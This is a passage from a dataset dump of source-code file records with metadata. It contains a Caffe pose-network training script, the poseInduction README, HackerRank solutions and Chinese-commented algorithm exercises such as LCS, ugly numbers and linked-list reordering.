%d\\n\" %stepsize)\n\t\tf.write(\"momentum : %f\\n\" %momentum)\n\t\tf.write(\"weight_decay : %f\\n\" %weight_decay)\n\t\tf.write(\"display : %d\\n\" %display)\n\t\tf.write(\"snapshot_prefix : \\\"%s\\\"\\n\" %prefix)\n\ndef parse_args():\n\t\"\"\"\n\tParse input arguments\n\t\"\"\"\n\tparser = argparse.ArgumentParser(description='Train a pose prediction network')\n\n\t## prototxt output parameters\n\tparser.add_argument('--folder', help='where to output the prototxt file',\n\t\tdefault=None, type=str)\n\tparser.add_argument('--filename', help='where to output the file',\n default=\"train.prototxt\", type=str)\n\tparser.add_argument('--valfilename', help='where to output the file',\n default=\"test.prototxt\", type=str)\n\tparser.add_argument('--testfilename', help='where to print test prototxt',\n default=\"deploy.prototxt\", type=str)\n\n\t## Learning parameters\n\tparser.add_argument('--learn_fc', default=1, type=float)\n\tparser.add_argument('--learn_conv', default=1, type=float)\n\n\t## Net Architecture\n\tparser.add_argument('--quat_loss', default=0, type=float)\n\tparser.add_argument('--softmax_loss', default=1, type=float)\n\tparser.add_argument('--vgg', default=1, type=float, help='whether to use VGG net or Alexnet')\n\tparser.add_argument('--azimuth_net', default = 0, type = float, help = 'whether to use joint or azimuth net')\n\tparser.add_argument('--class_agnostic', default = 1, type = float, help = 'whether to use same fc8 units across classes')\n\n\t## Input data parameters\n\tparser.add_argument('--warp', default=1, type=float, help='use warp or square crop')\n\tparser.add_argument('--cpad', default=16, type=float, help='input context paddding')\n\tparser.add_argument('--flip', default=1, type=float, help='whether to use VGG net or Alexnet')\n\tparser.add_argument('--batch_size', default=20, type=int, help='number of images in 1 minibatch')\n\tparser.add_argument('--crop_size', default=224, type=int, help='input size')\n\tparser.add_argument('--window_file_folder', default='/data1/shubhtuls/code/poseInduction/cachedir/rcnnFinetuneVps/binnedJoint/', type=str)\n\n\t## Solver parameters\n\tparser.add_argument('--max_iter', default=70000, type=int)\n\tparser.add_argument('--snapshot', default=10000, type=int)\n\tparser.add_argument('--test_iter', default=100, type=int)\n\tparser.add_argument('--test_interval', default=1000, type=int)\n\tparser.add_argument('--base_lr', default=0.001, type=float)\n\tparser.add_argument('--lr_policy', default='step')\n\tparser.add_argument('--gamma', default=0.1, type=float)\n\tparser.add_argument('--stepsize', default=20000, type=int)\n\tparser.add_argument('--momentum', default=0.9, type=float)\n\tparser.add_argument('--weight_decay', default=0.005, type=float)\n\tparser.add_argument('--display', default=200, type=int)\n\tparser.add_argument('--snapshot_folder', default='/data1/shubhtuls/code/poseInduction/cachedir/snapshots/')\n\tparser.add_argument('--snapshot_subdir', default='')\n\tparser.add_argument('--snapshot_prefix', default='net')\n\n\tif len(sys.argv) == 1:\n\t\tparser.print_help()\n\t\tsys.exit(1)\n\n\targs = parser.parse_args()\n\n\treturn args\n\nif __name__ == '__main__':\n\targs = parse_args()\n\n\tprint('Called with args:')\n\tprint(args)\n\tassert(args.folder != None), 'output folder not specified'\n\tassert(args.snapshot_subdir != ''), 'snapshot subdirectory not specified'\n\tmkdir_p(args.folder)\n\tconstructNet(args.folder,\n\t\tfilename = args.filename,\n\t\tvalfilename = args.valfilename,\n\t\ttestfilename = args.testfilename,\n\t\tlearn_fc = args.learn_fc, learn_conv = args.learn_conv,\n\t\tquat_loss = args.quat_loss, softmax_loss = args.softmax_loss, azimuth_net = args.azimuth_net, class_agnostic = args.class_agnostic,\n\t\tvgg = args.vgg,\n\t\twarp = args.warp, cpad = args.cpad,\n\t\tflip = args.flip, batch_size = args.batch_size, crop_size = args.crop_size,\n\t\twindow_file_folder = args.window_file_folder)\n\n\tconstructSolver(args.folder,\n\t\tfilename = args.filename, valfilename = args.valfilename,\n\t\tmax_iter = args.max_iter, snapshot = args.snapshot, test_iter = args.test_iter, test_interval = args.test_interval,\n\t\tbase_lr = args.base_lr, lr_policy= args.lr_policy, gamma = args.gamma ,stepsize = args.stepsize , momentum = args.momentum ,weight_decay = args.weight_decay,\n\t\tdisplay= args.display,\n\t\tsnapshot_folder = args.snapshot_folder, snapshot_subdir = args.snapshot_subdir, snapshot_prefix = args.snapshot_prefix)\n"
},
{
"alpha_fraction": 0.7485604882240295,
"alphanum_fraction": 0.7543185949325562,
"avg_line_length": 46.33333206176758,
"blob_id": "5baa97666b4d72d7f33747879cda89a7a6c8c9fb",
"content_id": "751b16b5e7d15af943eaacfc8a175dabb797550d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1563,
"license_type": "no_license",
"max_line_length": 300,
"num_lines": 33,
"path": "/README.md",
"repo_name": "afcarl/poseInduction",
"src_encoding": "UTF-8",
"text": "# Pose Induction.\n\n[Shubham Tulsiani](http://cs.berkeley.edu/~shubhtuls), [Joao Carreira](http://www.cs.berkeley.edu/~carreira/) and [Jitendra Malik](http://cs.berkeley.edu/~malik). Pose Induction for Novel Object Categories. In ICCV, 2015.\n\n### 0) Setup\n- Download the code\n```git clone --recursive https://github.com/shubhtuls/poseInduction```\n\n- We first need to download the required datasets (PASCAL VOC and PASCAL3D+) and additional annotations. In addition, we also need to reorganize some data. To do this automatically, run\n```bash initSetup.sh```\n\n- Edit the required paths in 'startup.m', specially if you've used a local copy of some data instead of downloading via initSetup.sh\n\n- Compile external/caffe (this is a slightly modified and outdated version of the [original](http://caffe.berkeleyvision.org/)). Sample compilation instructions are provided below. In case of any issues, refer to the installation instructions on the [caffe website](http://caffe.berkeleyvision.org/).\n\n```\ncd external/caffe\ncp Makefile.config.example Makefile.config\nmake -j 8\n#edit MATLAB_DIR in Makefile.config\nmake matcaffe pycaffe\ncd ../..\n```\n\n### 1) Demo\n- Initialize matlab in the root directory of the code.\n\n- Run\n``` startup; demo(); ```.\nthis will download our pretrained model and demonstrate predicted pose for a few images. Note that all the object classes in the demo images are novel (except for car which serves as a sanity check).\n\n### 2) Training Models and Reproducing Experiments\nThis part of the codebase is still under construction. We'll update the instructions shortly.\n\n"
}
] | 3 |
JevinD/HackerRank
|
https://github.com/JevinD/HackerRank
|
eadbf6e7e389deeb7f7a34761da69c2ada68aec8
|
e0e9d8fd2b3ae6fc9deb184033ee853150568187
|
f94d713676448c9c6103d08d9adde033d4724ada
|
refs/heads/master
| 2021-07-23T00:05:28.423244 | 2020-06-24T17:49:45 | 2020-06-24T17:49:45 | 189,168,559 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5542168617248535,
"alphanum_fraction": 0.5614457726478577,
"avg_line_length": 18.761905670166016,
"blob_id": "3dad64823f3ad336dbae3dc0058b83c3317fc29c",
"content_id": "4a26451fddbccfac4f29a86ecbe533c8df964cd7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 830,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 42,
"path": "/Repeated_String.py",
"repo_name": "JevinD/HackerRank",
"src_encoding": "UTF-8",
"text": "#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the repeatedString function below.\ndef repeatedString(s, n):\n arr = []\n aInString = 0\n leftOverCount = 0\n timesRan = (int)(n/len(s))\n leftOver = n%len(s)\n arr=s[0:leftOver]\n #for every char in the s check count the a's\n for i in range(len(s)):\n if s[i] == 'a':\n aInString +=1\n \n #adds leftover count while checking for how many a's in reg count\n if i < len(arr) and s[i] =='a':\n leftOverCount +=1\n \n return timesRan*aInString + leftOverCount\n \n\n\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n s = input()\n\n n = int(input())\n\n result = repeatedString(s, n)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n"
},
{
"alpha_fraction": 0.6712820529937744,
"alphanum_fraction": 0.6846153736114502,
"avg_line_length": 27.676469802856445,
"blob_id": "ff533e6b856ba8641399b86911ff4985ea04b649",
"content_id": "b238f160c57d1ff720bc350cd635718e5c123273",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1950,
"license_type": "no_license",
"max_line_length": 294,
"num_lines": 68,
"path": "/beautiful-days-at-the-movies.py",
"repo_name": "JevinD/HackerRank",
"src_encoding": "UTF-8",
"text": "'''\nProblem\nLily likes to play games with integers. She has created a new game where she determines the difference between a number and its reverse. For instance, given the number , its reverse is . Their difference is . The number reversed is , and their difference is .\nShe decides to apply her game to decision making. She will look at a numbered range of days and will only go to a movie on a beautiful day.\nGiven a range of numbered days, and a number , determine the number of days in the range that are beautiful. Beautiful numbers are defined as numbers where is evenly divisible by . If a day's value is a beautiful number, it is a beautiful day. Print the number of beautiful days in the range.\n\nFunction Description\nComplete the beautifulDays function in the editor below. It must return the number of beautiful days in the range.\nbeautifulDays has the following parameter(s):\n\ni: the starting day number\nj: the ending day number\nk: the divisor\n\nInput Format\nA single line of three space-separated integers describing the respective values of , , and .\n\nConstraints\n1<i<=j<=2*10**6\n1<=k<=2*10**9\n\nOutput Format\nPrint the number of beautiful days in the inclusive range between and .\n'''\n\n#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the beautifulDays function below.\ndef beautifulDays(i, j, k):\n count = 0\n for num in range(i,j+1):\n rev=reverseDigits(num)\n print((abs(num-rev)))\n if (abs(num-rev)%k)== 0:\n count+=1\n return count\n\n#reverses the Digits\ndef reverseDigits(num): \n rev = 0\n while(num > 0): \n a = num % 10\n rev = rev * 10 + a \n num = num // 10\n return rev\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n ijk = input().split()\n\n i = int(ijk[0])\n\n j = int(ijk[1])\n\n k = int(ijk[2])\n\n result = beautifulDays(i, j, k)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n"
}
] | 2 |
melo4/jianzhioffer
|
https://github.com/melo4/jianzhioffer
|
7b50a741a6c8ec08a676410d1fc7ec5c21043f10
|
4f139f578f4c6c6d402886cfca4c0d8adb856f1f
|
35c79ef552b90434fb9d3a6cccb3ed7851fcb61a
|
refs/heads/master
| 2020-04-29T15:34:05.750162 | 2019-09-30T09:43:33 | 2019-09-30T09:43:33 | 176,232,506 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4532374143600464,
"alphanum_fraction": 0.49880096316337585,
"avg_line_length": 18.85714340209961,
"blob_id": "5620b0cdcac714cf6a12ae082ea8ebeb4894a27e",
"content_id": "3072cbf77fcf17871a958e83033b8c66c1d46338",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 417,
"license_type": "no_license",
"max_line_length": 36,
"num_lines": 21,
"path": "/求组合数.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/9/14 21:42\n# @Author : Meng Xiao\ndef get_value(n):\n if n == 1:\n return n\n else:\n return n * get_value(n - 1)\n\n\ndef gen_last_value(n, m):\n first = get_value(n)\n second = get_value(m)\n third = get_value((n - m))\n return first // (second * third)\n\n\nif __name__ == \"__main__\":\n # C(12,5)\n rest = gen_last_value(5, 1)\n print(\"value:\", rest)\n"
},
{
"alpha_fraction": 0.47648516297340393,
"alphanum_fraction": 0.4987623691558838,
"avg_line_length": 27.89285659790039,
"blob_id": "d42d646ce87b07136c7584106547cc91b7035b0b",
"content_id": "30ba2dc90217b6d1142a1ea52334ecbaadb37923",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 902,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 28,
"path": "/最长不含重复字符的子字符串.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/15 下午9:33\n# @Author : Meng Xiao\nclass Solution:\n '''\n 动态规划,f(i):以第i个字符结尾的字符串包含不包含重复字符的子串长度\n '''\n def longestSub(self, s):\n if not s:\n return\n curLength = 0\n maxLength = 0\n position = [-1] * 26 #用于标示每个字符上次出现的位置\n for i in range(len(s)):\n preIndex = position[ord(s[i])-ord('a')]\n if preIndex < 0 or i - preIndex > curLength:\n curLength += 1\n else:\n if curLength > maxLength:\n maxLength = curLength\n curLength = i - preIndex\n position[ord(s[i])-ord('a')] = i\n # if curLength > maxLength:\n # maxLength = curLength\n return maxLength\n\ns = Solution()\nprint(s.longestSub('arabcacfr'))"
},
{
"alpha_fraction": 0.4295977056026459,
"alphanum_fraction": 0.5416666865348816,
"avg_line_length": 28,
"blob_id": "11fb4c821cd38b6c702e0070b8c6679d30a73c32",
"content_id": "8acf87e8a94cc1021f5894925b5b970a8e8ea674",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 946,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 24,
"path": "/神奇数.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/8/31 15:27\n# @Author : Meng Xiao\n'''\n给出一个区间[a, b],计算区间内“神奇数”的个数。\n神奇数的定义:存在不同位置的两个数位,组成一个两位数(且不含前导0),且这个两位数为质数。\n比如:153,可以使用数字3和数字1组成13,13是质数,满足神奇数。同样153可以找到31和53也为质数,只要找到一个质数即满足神奇数。\n'''\nimport itertools\na, b = map(int, input().split())\nzs = [11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97]\n# 所有两位的质数\nnum = 0\nfor i in range(a, b+1):\n tt = list(str(i))\n for item in itertools.combinations(tt, 2):\n tep = [int(''.join(item)), int(''.join(item[::-1]))]\n for j in tep:\n if j in zs and j >= 10:\n num += 1\n break\n else:\n continue\nprint(num)\n"
},
{
"alpha_fraction": 0.5299891233444214,
"alphanum_fraction": 0.5517993569374084,
"avg_line_length": 24.47222137451172,
"blob_id": "f347cf6dae6f5c49aba8e768d8ec574edd7d2646",
"content_id": "b2f60a2bd6567da52683c9eaf5de3272a9cfc2e4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 961,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 36,
"path": "/二叉树中和为某一值的路径.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/11 下午3:27\n# @Author : Meng Xiao\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\nclass Solution:\n # 返回二维列表,内部每个列表表示找到的路径\n def FindPath(self, root, expectNum):\n if not root or root.val > expectNum:\n return []\n if not root.left and not root.right and root.val == expectNum:\n return [[root.val]]\n else:\n expectNum -= root.val\n left = self.FindPath(root.left, expectNum)\n right = self.FindPath(root.right, expectNum)\n\n result = [[root.val]+i for i in left]\n for i in right:\n result.append([root.val]+i)\n\n return result\na = TreeNode(10)\nb = TreeNode(5)\nc = TreeNode(12)\nd = TreeNode(4)\ne = TreeNode(7)\na.left = b\na.right = c\nb.left = d\nb.right = e\ns = Solution()\nprint(s.FindPath(a, 22))\n"
},
{
"alpha_fraction": 0.32447296380996704,
"alphanum_fraction": 0.36892759799957275,
"avg_line_length": 28.486486434936523,
"blob_id": "fa36f8b258b08693d222cc3ade1d3de05e509f04",
"content_id": "96ce42c8d37628fb8b045574184dd86d7bf47cfa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2212,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 74,
"path": "/LCS最长公共子序列.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/22 下午4:12\n# @Author : Meng Xiao\nclass Solution:\n def maxSubSequence(self, s1, s2):\n if not s1 or not s2:\n return\n if len(s1) == 0 or len(s2) == 0:\n return 0\n flag = 0\n dp = [[0 for j in range(len(s2)+1)] for i in range(len(s1)+1)]\n for i in range(1, len(s1)+1):\n for j in range(1, len(s2)+1):\n if s1[i-1] == s2[j-1]:\n dp[i][j] = dp[i-1][j-1] + 1\n else:\n dp[i][j] = max(dp[i-1][j], dp[i][j-1])\n i, j = len(s1), len(s2)\n while i >= 1 and j >= 1:\n if s1[i-1] == s2[j-1]:\n print(s1[i-1])\n i -= 1\n j -= 1\n else:\n if dp[i][j-1] > dp[i-1][j]:\n j -= 1\n else:\n i -= 1\n\n return dp[-1][-1]\n\n # 最长公共子串\n def maxSubStr(self, s1, s2):\n if not s1 or not s2:\n return\n len1 = len(s1)\n len2 = len(s2)\n dp = [[0 for j in range(len2)] for i in range(len1)]\n maxLength = 0\n for i in range(len1):\n for j in range(len2):\n if s1[i] == s2[j]:\n if i == 0 or j == 0:\n dp[i][j] = 1\n else:\n dp[i][j] = dp[i-1][j-1] + 1\n if dp[i][j] > maxLength:\n maxLength = dp[i][j]\n start_index = i - dp[i][j] + 1\n print(s1[start_index:start_index+maxLength])\n return maxLength\n\n # 最长上升子序列\n def maxIncrease(self, arr):\n if not arr:\n return \n maxLen = 0\n n = len(arr)\n dp = [1] * n\n for i in range(n):\n for j in range(i):\n if arr[j] < arr[i]:\n dp[i] = max(dp[j]+1, dp[i])\n maxLen = max(dp)\n res = []\n for i in range(n-1, -1, -1):\n if dp[i] == maxLen:\n res.append(arr[i])\n maxLen -= 1\n print(res[::-1])\n return max(dp)\n\ns = Solution()\nprint(s.maxIncrease([1,5,2,6,7,3]))\n"
},
{
"alpha_fraction": 0.27542373538017273,
"alphanum_fraction": 0.3262711763381958,
"avg_line_length": 25.27777862548828,
"blob_id": "1163747b29babe291a6a25cc9b57d80965fb36d2",
"content_id": "c2dc931f589706117772de98b6c487a6b993dd4c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 472,
"license_type": "no_license",
"max_line_length": 153,
"num_lines": 18,
"path": "/十进制转任意进制.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/9/21 20:30\n# @Author : Meng Xiao\ndef func2(n, x):\n a = ['0','1','2','3','4','5','6','7','8','9','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z']\n b = []\n while True:\n s = n // x\n y = n % x\n b = b + [y]\n if s == 0:\n break\n n = s\n b.reverse()\n res = []\n for i in b:\n res.append(a[i])\n return ''.join(res)"
},
{
"alpha_fraction": 0.3937729001045227,
"alphanum_fraction": 0.4432234466075897,
"avg_line_length": 29.27777862548828,
"blob_id": "9019f43879dbf819772e2ce966fd66e926aacdca",
"content_id": "1596754f2cbab3dd8b4b2a5b2225e4bc3ea89768",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 546,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 18,
"path": "/leetcode-892三维形体表面积.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/8/26 10:30\n# @Author : Meng Xiao\n\nclass Solution:\n def surfaceArea(self, grid):\n s = sum(sum([4*i+2 for i in m if i != 0]) for m in grid)\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if j != len(grid[0]) - 1:\n s -= min(grid[i][j], grid[i][j+1]) * 2\n if i != len(grid) - 1:\n s -= min(grid[i][j], grid[i+1][j]) * 2\n return s\n\ns = Solution()\ngrid = [[1,2],[3,4]]\nprint(s.surfaceArea(grid))\n\n"
},
{
"alpha_fraction": 0.4824742376804352,
"alphanum_fraction": 0.4845360815525055,
"avg_line_length": 23.897436141967773,
"blob_id": "a7edc96f19fbf7bea840d3dd0154b944966cd947",
"content_id": "f12c7832d70a551763b08206ff02ebacec0fcd4c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 970,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 39,
"path": "/111.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "class TrieNode:\n def __init__(self):\n self.is_word = False\n self.data = {}\n\nclass Trie:\n def __init__(self):\n self.root = TrieNode()\n def insert(self, word):\n node = self.root\n for letter in word:\n child = node.data.get(letter)\n if not child:\n node.data[letter] = TrieNode()\n node = node.data[letter]\n node.is_word = True\n def search(self, word):\n cur = ''\n ans = []\n node = self.root\n for letter in word:\n node = node.data.get(letter)\n cur += letter\n if not node:\n return ans\n if (node.is_word == True):\n ans.append(cur)\n return ans\n\ntrie = Trie()\ns = \"abcdefg\"\nd = ['ab','abc','abcd','bcd','bcde','bde','efg']\nfor x in d:\n trie.insert(x)\nprint(trie.root.data)\nfor i in range(0,len(s)):\n lst = trie.search(s[i:])\n if(len(lst)!=0):\n print(lst)"
},
{
"alpha_fraction": 0.47746968269348145,
"alphanum_fraction": 0.4878682792186737,
"avg_line_length": 23.04166603088379,
"blob_id": "0b93063aa46030a4039fe2eab673b1e550d2feba",
"content_id": "5150e8b04c9f3b7b8b8335d13fd9d0e4f6950264",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1154,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 48,
"path": "/leetcode-143重排链表.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/7/26 10:53\n# @Author : Meng Xiao\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n def reorderList(self, head):\n \"\"\"\n Do not return anything, modify head in-place instead.\n \"\"\"\n if not head or not head.next:\n return head\n mid = head\n right = head.next\n while right.next and right.next.next:\n mid = mid.next\n right = right.next.next\n right = mid.next\n mid.next = None\n\n right = self.reverseList(right)\n\n cur = head\n while cur.next:\n tmp = cur.next\n cur.next = right\n right = right.next\n cur.next.next = tmp\n cur = tmp\n cur.next = right\n\n return head\n\n def reverseList(self, head):\n if not head or not head.next:\n return head\n prev = None\n cur = head\n while cur:\n nxt = cur.next\n cur.next = prev\n prev = cur\n cur = nxt\n return prev\n"
},
{
"alpha_fraction": 0.41726619005203247,
"alphanum_fraction": 0.46882495284080505,
"avg_line_length": 29.851852416992188,
"blob_id": "05aeee5bcd8d3a1e511dda2acd0c62f0d074226a",
"content_id": "cfe7c850f0dc8cc2b3b3406b723a023afd53f614",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 868,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 27,
"path": "/把数字翻译成字符串.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/15 下午7:34\n# @Author : Meng Xiao\nclass Solution:\n def getTranslationCount(self, num):\n if not isinstance(num, int) or num < 0:\n return\n str_num= str(num)\n length = len(str_num)\n counts = [0] * length # 表示从第i位开始的不同翻译的数目\n\n for i in range(length-1, -1, -1):\n if i == length - 1:\n counts[i] = 1\n continue\n\n count = counts[i+1]\n value = (ord(str_num[i]) - ord('0')) * 10 + (ord(str_num[i+1]) - ord('0'))\n if i == length - 2:\n count += 1 if 10 <= value <= 25 else 0\n else:\n count += counts[i+2] if 10 <= value <= 25 else 0\n counts[i] = count\n return counts[0]\n\ns = Solution()\nprint(s.getTranslationCount(12258))\n\n"
},
{
"alpha_fraction": 0.3853503167629242,
"alphanum_fraction": 0.4554140269756317,
"avg_line_length": 23.153846740722656,
"blob_id": "94d7a1334fffcf670fc0454ec97d8cc59ee605a5",
"content_id": "3f2db83285f46f4d95dd615b4d060b32e6481c7f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 314,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 13,
"path": "/整数反转.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "\n# -*- coding: utf-8 -*-\n# @Time : 2019/5/7 20:54\n# @Author : Meng Xiao\nclass Solution(object):\n def reverse(self, x):\n\n if x < 0:\n return -self.reverse(-x)\n res = 0\n while x:\n res = res * 10 + x % 10\n x /= 10\n return res if res <= 0x7fffffff else 0"
},
{
"alpha_fraction": 0.39080458879470825,
"alphanum_fraction": 0.5114942789077759,
"avg_line_length": 28,
"blob_id": "20394a852ed20139e639dba238fcbb039e194a85",
"content_id": "644f2ba3b0581927de416e3ebf3a6547ab0973fd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 352,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 12,
"path": "/不用加减乘除做加法.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": " # -*- coding: utf-8 -*-\n# @Time : 2019/4/18 下午10:00\n# @Author : Meng Xiao\nclass Solution:\n def Add(self, num1, num2):\n while num2 != 0:\n temp = num1 ^ num2\n num2 = (num1 & num2) << 1\n num1 = temp & 0xffffffff\n return num1 if num1 >> 31 == 0 else num1 - 4294967296\ns = Solution()\nprint(s.Add(5,3))"
},
{
"alpha_fraction": 0.47647058963775635,
"alphanum_fraction": 0.5235294103622437,
"avg_line_length": 31.730770111083984,
"blob_id": "10517486b6fdad3a448970d4fdbde6196caadb4e",
"content_id": "bf22bc780e7d9e99d207b8de01ec1510d92fd0d7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 854,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 26,
"path": "/丑数.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/5 下午3:37\n# @Author : Meng Xiao\nclass Solution:\n def GetUglyNumber(self, index):\n if not index:\n return 0\n ugly_number = [1] * index\n next_index = 1\n index2 = 0\n index3 = 0\n index5 = 0\n while next_index < index:\n minValue = min(ugly_number[index2]*2, ugly_number[index3]*3, ugly_number[index5]*5)\n ugly_number[next_index] = minValue\n\n while ugly_number[index2] * 2 <= ugly_number[next_index]:\n index2 += 1\n while ugly_number[index3] * 3 <= ugly_number[next_index]:\n index3 += 1\n while ugly_number[index5] * 5 <= ugly_number[next_index]:\n index5 += 1\n next_index += 1\n return ugly_number\ns = Solution()\nprint(s.GetUglyNumber(10))"
},
{
"alpha_fraction": 0.3391304314136505,
"alphanum_fraction": 0.44130435585975647,
"avg_line_length": 22.049999237060547,
"blob_id": "ab71d002024db19dcb29a6313938158d39a2d2ab",
"content_id": "54995cc4fa0d8b9fa2287aa8a1955fd0955d8b44",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 464,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 20,
"path": "/二维数组中的查找.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/3/18 下午4:11\n# @Author : Meng Xiao\ndef findE(list2d, x):\n if list2d == []:\n return False\n m = len(list2d)\n n = len(list2d[1])\n i = 0\n j = n-1\n while i < m and j >=0:\n if x == list2d[i][j]:\n return True\n if x < list2d[i][j]:\n j -= 1\n else:\n i += 1\n return False\nlist2d = [[1,2,8,9],[2,4,9,12],[4,7,10,13],[6,8,11,15]]\nprint(findE(list2d,5))"
},
{
"alpha_fraction": 0.43123939633369446,
"alphanum_fraction": 0.47028863430023193,
"avg_line_length": 25.81818199157715,
"blob_id": "07854d8f11a23964fccc8ccda25e8cdc7f0f746b",
"content_id": "5938ff965c8adf40221586f4bb276967e57bf509",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 593,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 22,
"path": "/数组中数值和下标相等的元素.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/16 下午10:20\n# @Author : Meng Xiao\nclass Solution:\n def GetNUmberSameAsIndex(self, numbers):\n length = len(numbers)\n if not numbers or length <= 0:\n return\n left = 0\n right = length - 1\n while left <= right:\n mid = (left + right) // 2\n if numbers[mid] == mid:\n return mid\n if numbers[mid] > mid:\n right = mid - 1\n else:\n left = mid + 1\n\n return\ns = Solution()\nprint(s.GetNUmberSameAsIndex([-3,-1,1,3,5]))"
},
{
"alpha_fraction": 0.5544827580451965,
"alphanum_fraction": 0.5786206722259521,
"avg_line_length": 20.984848022460938,
"blob_id": "699d120c48a43727b5cf043080e02a7363c4c00b",
"content_id": "8aa7779b0ef0fe9439444648b6d4530788b36a26",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1746,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 66,
"path": "/m-n之间链表反转.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
